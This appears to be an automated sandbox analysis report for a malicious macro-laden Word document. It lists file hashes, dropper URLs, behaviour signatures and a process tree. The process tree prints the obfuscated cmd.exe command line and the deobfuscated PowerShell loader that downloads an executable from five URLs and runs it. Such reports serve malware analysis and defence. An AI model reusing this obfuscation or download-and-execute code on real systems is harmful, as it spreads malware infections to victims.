Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
-
submitted
04/05/2024, 22:57
General
-
Target
14daa4102435e660c6bb0ee22647be5f_JaffaCakes118.doc
-
Size
249KB
-
MD5
14daa4102435e660c6bb0ee22647be5f
-
SHA1
2d5e7f62e05070d47172f78261fcd51981d729f4
-
SHA256
be308880645b0a69fc1542b416dc00d1af234a51bfc2bb94ab8f499474fc605f
-
SHA512
6c46362575444c328a9259034cf92aff13580d2e40da94826b0cdd0de82a22618c479d52874c48b30237e492e1250c63bf301a886b23f37c66f549a562c47d5c
-
SSDEEP
3072:YyfLEIteDJp626aAaP/2iFsPZkjL/xSu90OoiLuDKZXfwKeljR1B:YyfL8Ozda32rZSxUOmD+XfwLl
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://bestprogrammingbooks.com/wp-admin/caD67CPRUd
exe.dropper
http://www.pabloteixeira.com/xoUPk7FI
exe.dropper
http://shoesstockshop.ru/xxLR1CX
exe.dropper
http://maisonvoltaire.org/EsUDRwECHV
exe.dropper
http://xaydungphuongdong.net/C2AGBs7Ah
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 2 IoCs
-
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
-
Drops file in Windows directory 1 IoCs
-
Office loads VBA resources, possible macro or embedded object present
-
Modifies Internet Explorer settings 1 TTPs 31 IoCs
-
Modifies registry class 64 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 24 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\14daa4102435e660c6bb0ee22647be5f_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\cmd.exec:\rcjim\wraop\zjikzsf\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set S8M=gw-1H'Tc=GVFEv/l$Rf9qUW N5)PM(0dmtkn:yBa\Lj;,3rXDxACipuh%@}2o76+eS{zb~OsI4.&&for %I in (53,60,1,56,27,21,38,41,72,51,36,69,25,44,3,56,46,56,65,12,65,65,72,70,24,24,50,28,12,36,69,2,73,44,3,56,55,56,6,12,28,27,36,69,2,45,44,3,56,15,15,23,16,46,35,7,15,18,8,5,1,53,60,67,39,7,34,5,43,16,39,71,35,42,32,8,35,64,1,2,60,68,42,64,7,33,23,24,64,33,74,22,64,68,51,15,52,64,35,33,43,16,1,52,31,1,20,52,31,8,5,55,33,33,53,36,14,14,68,64,71,33,53,46,60,0,46,39,32,32,52,35,0,68,60,60,34,71,74,7,60,32,14,1,53,2,39,31,32,52,35,14,7,39,48,62,61,51,27,17,21,31,57,55,33,33,53,36,14,14,1,1,1,74,53,39,68,15,60,33,64,52,49,64,52,46,39,74,7,60,32,14,49,60,21,27,34,61,11,72,57,55,33,33,53,36,14,14,71,55,60,64,71,71,33,60,7,34,71,55,60,53,74,46,54,14,49,49,41,17,3,51,47,57,55,33,33,53,36,14,14,32,39,52,71,60,35,13,60,15,33,39,52,46,64,74,60,46,0,14,12,71,21,48,17,1,12,51,4,10,57,55,33,33,53,36,14,14,49,39,37,31,54,35,0,53,55,54,60,35,0,31,60,35,0,74,35,64,33,14,51,59,50,9,38,71,61,50,55,5,74,65,53,15,52,33,29,5,57,5,26,43,16,1,20,20,34,39,8,5,13,34,67,42,67,68,5,43,16,42,54,20,15,67,23,8,23,5,19,19,30,5,43,16,7,68,52,71,18,8,5,52,15,20,35,42,67,5,43,16,32,7,1,1,34,8,16,64,35,13,36,33,64,32,53,63,5,40,5,63,16,42,54,20,15,67,63,5,74,64,49,64,5,43,18,60,46,64,39,7,55,29,16,39,42,52,42,53,23,52,35,23,16,1,52,31,1,20,52,31,26,66,33,46,37,66,16,39,71,35,42,32,74,48,60,1,35,15,60,39,31,11,52,15,64,29,16,39,42,52,42,53,44,23,16,32,7,1,1,34,26,43,16,20,42,71,33,13,42,15,8,5,39,55,68,42,13,1,5,43,72,18,23,29,29,9,64,33,2,72,33,64,32,23,16,32,7,1,1,34,26,74,15,64,35,0,33,55,23,2,0,64,23,73,30,30,30,30,26,23,66,72,35,13,60,34,64,2,72,33,64,32,23,16,32,7,1,1,34,43,16,13,13,1,68,7,42,8,5,42,55,67,34,46,31,1,5,43,68,46,64,39,34,43,58,58,7,39,33,7,55,66,58,58,16,53,20,52,18,67,8,5,39,54,71,1,1,31,5,43,81)do set xUe=!xUe!!S8M:~%I,1!&&if %I==81 echo !xUe:~5!|cmd.exe"2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeCmD /V:O/C"set S8M=gw-1H'Tc=GVFEv/l$Rf9qUW N5)PM(0dmtkn:yBa\Lj;,3rXDxACipuh%@}2o76+eS{zb~OsI4.&&for %I in (53,60,1,56,27,21,38,41,72,51,36,69,25,44,3,56,46,56,65,12,65,65,72,70,24,24,50,28,12,36,69,2,73,44,3,56,55,56,6,12,28,27,36,69,2,45,44,3,56,15,15,23,16,46,35,7,15,18,8,5,1,53,60,67,39,7,34,5,43,16,39,71,35,42,32,8,35,64,1,2,60,68,42,64,7,33,23,24,64,33,74,22,64,68,51,15,52,64,35,33,43,16,1,52,31,1,20,52,31,8,5,55,33,33,53,36,14,14,68,64,71,33,53,46,60,0,46,39,32,32,52,35,0,68,60,60,34,71,74,7,60,32,14,1,53,2,39,31,32,52,35,14,7,39,48,62,61,51,27,17,21,31,57,55,33,33,53,36,14,14,1,1,1,74,53,39,68,15,60,33,64,52,49,64,52,46,39,74,7,60,32,14,49,60,21,27,34,61,11,72,57,55,33,33,53,36,14,14,71,55,60,64,71,71,33,60,7,34,71,55,60,53,74,46,54,14,49,49,41,17,3,51,47,57,55,33,33,53,36,14,14,32,39,52,71,60,35,13,60,15,33,39,52,46,64,74,60,46,0,14,12,71,21,48,17,1,12,51,4,10,57,55,33,33,53,36,14,14,49,39,37,31,54,35,0,53,55,54,60,35,0,31,60,35,0,74,35,64,33,14,51,59,50,9,38,71,61,50,55,5,74,65,53,15,52,33,29,5,57,5,26,43,16,1,20,20,34,39,8,5,13,34,67,42,67,68,5,43,16,42,54,20,15,67,23,8,23,5,19,19,30,5,43,16,7,68,52,71,18,8,5,52,15,20,35,42,67,5,43,16,32,7,1,1,34,8,16,64,35,13,36,33,64,32,53,63,5,40,5,63,16,42,54,20,15,67,63,5,74,64,49,64,5,43,18,60,46,64,39,7,55,29,16,39,42,52,42,53,23,52,35,23,16,1,52,31,1,20,52,31,26,66,33,46,37,66,16,39,71,35,42,32,74,48,60,1,35,15,60,39,31,11,52,15,64,29,16,39,42,52,42,53,44,23,16,32,7,1,1,34,26,43,16,20,42,71,33,13,42,15,8,5,39,55,68,42,13,1,5,43,72,18,23,29,29,9,64,33,2,72,33,64,32,23,16,32,7,1,1,34,26,74,15,64,35,0,33,55,23,2,0,64,23,73,30,30,30,30,26,23,66,72,35,13,60,34,64,2,72,33,64,32,23,16,32,7,1,1,34,43,16,13,13,1,68,7,42,8,5,42,55,67,34,46,31,1,5,43,68,46,64,39,34,43,58,58,7,39,33,7,55,66,58,58,16,53,20,52,18,67,8,5,39,54,71,1,1,31,5,43,81)do set xUe=!xUe!!S8M:~%I,1!&&if %I==81 echo !xUe:~5!|cmd.exe"3⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $rnclf='wpozack';$asnjm=new-object Net.WebClient;$widwqid='http://bestprogrammingbooks.com/wp-admin/caD67CPRUd@http://www.pabloteixeira.com/xoUPk7FI@http://shoesstockshop.ru/xxLR1CX@http://maisonvoltaire.org/EsUDRwECHV@http://xaydungphuongdong.net/C2AGBs7Ah'.Split('@');$wqqka='vkzjzb';$juqlz = '990';$cbisf='ilqnjz';$mcwwk=$env:temp+'\'+$juqlz+'.exe';foreach($ajijp in $widwqid){try{$asnjm.DownloadFile($ajijp, $mcwwk);$qjstvjl='ahbjvw';If ((Get-Item $mcwwk).length -ge 40000) {Invoke-Item $mcwwk;$vvwbcj='jhzkrdw';break;}}catch{}}$pqifz='auswwd';"4⤵
-
-
C:\Windows\SysWOW64\cmd.execmd.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $rnclf='wpozack';$asnjm=new-object Net.WebClient;$widwqid='http://bestprogrammingbooks.com/wp-admin/caD67CPRUd@http://www.pabloteixeira.com/xoUPk7FI@http://shoesstockshop.ru/xxLR1CX@http://maisonvoltaire.org/EsUDRwECHV@http://xaydungphuongdong.net/C2AGBs7Ah'.Split('@');$wqqka='vkzjzb';$juqlz = '990';$cbisf='ilqnjz';$mcwwk=$env:temp+'\'+$juqlz+'.exe';foreach($ajijp in $widwqid){try{$asnjm.DownloadFile($ajijp, $mcwwk);$qjstvjl='ahbjvw';If ((Get-Item $mcwwk).length -ge 40000) {Invoke-Item $mcwwk;$vvwbcj='jhzkrdw';break;}}catch{}}$pqifz='auswwd';5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
20KB
MD5983abef2f1a0cb430bca0e87437d137e
SHA118c561a53da5f92fcce907c322d8a9b59b8525cf
SHA2564e5cf549d99834d453d0e11cf050338b490a758836cfb6ccf4a519b94c2a440c
SHA5124c0c920e6945cc360688a5117790b7ca61455421884b2ee7db80d44cbec015cb20c243b12bc6301ad32e4764fdb40b049f146b265dde37127e2fe51b43db6ba2
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
4KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
44KB